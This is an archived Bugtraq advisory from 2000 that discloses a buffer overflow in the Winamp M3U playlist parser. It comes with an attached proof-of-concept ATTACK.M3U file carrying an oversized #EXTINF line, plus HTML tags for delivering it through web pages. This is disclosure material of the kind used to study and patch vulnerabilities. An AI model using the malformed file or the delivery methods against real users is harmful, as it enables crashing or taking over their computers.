[15878] in bugtraq
Winamp M3U playlist parser buffer overflow security vulnerability
daemon@ATHENA.MIT.EDU (Pauli Ojanpera)
Thu Jul 20 18:17:36 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_6492_74c$21af"
Message-Id: <LAW-F83FV4TJvGa1hXE000013d0@hotmail.com>
Date: Thu, 20 Jul 2000 19:52:56 EEST
Reply-To: Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>
From: Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_6492_74c$21af
Content-Type: text/plain; format=flowed
LEGAL NOTICE:
By reading this you do agree that life does not make
sense and it doesn't need to. You also agree to
wear a condom. You do agree to think about nature.
.. umm you also agree to GPL all software you've ever
written.
[Click here if you're under 18]
There is a buffer overflow security vulnerability in
Winamp's (http://www.winamp.com) M3U playlist parser.
The overflow happens when an M3U extension called "#EXTINF:" is being
handled. The size of the parameter
following that keyword is not checked.
Real world example:
--cut-here-and-paste-to-a-file-with-m3u-extension--
#EXTM3U
#EXTINF:AAAAAAAAA....AAAAAAAAA<cr><lf>
--cut here--
There should be at least 280 A's.
The overflow allows total control over ones computer.
For example one could embedd an M3U file to a web page
several ways:
- <A HREF="ATTACK.M3U">
- <BGSOUND SRC="ATTACK.M3U">
- <EMBED SRC="ATTACK.M3U">
I have tested the first one but I have Media Player
installed on this computer and my browser uses its
components for the latter two so I cannot confirm..
The only problem is some structure (FILE *?) after
the buffer because it has a zero in it and it must
not be crafted to successfully return from the function.
I had to apply some trial and error to get code executed.
Currently the code crafts Winamp's MOD file format support
until restarted (I presume so.. :-).
The attached .M3U file should crash Winamp at 0000:41414141. I've tested it
with Windows 98 and
Windows 95 with Winamp versions 2.62 and 2.64.
Thank you.. I might not be available too frequently
to answer your mail.. Have a nice life. Bye.
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
------=_NextPart_000_6492_74c$21af
Content-Type: text/plain; name="ATTACK.M3U"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="ATTACK.M3U"
#EXTM3U
#EXTINF:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA !��PPPPAAAA
------=_NextPart_000_6492_74c$21af--
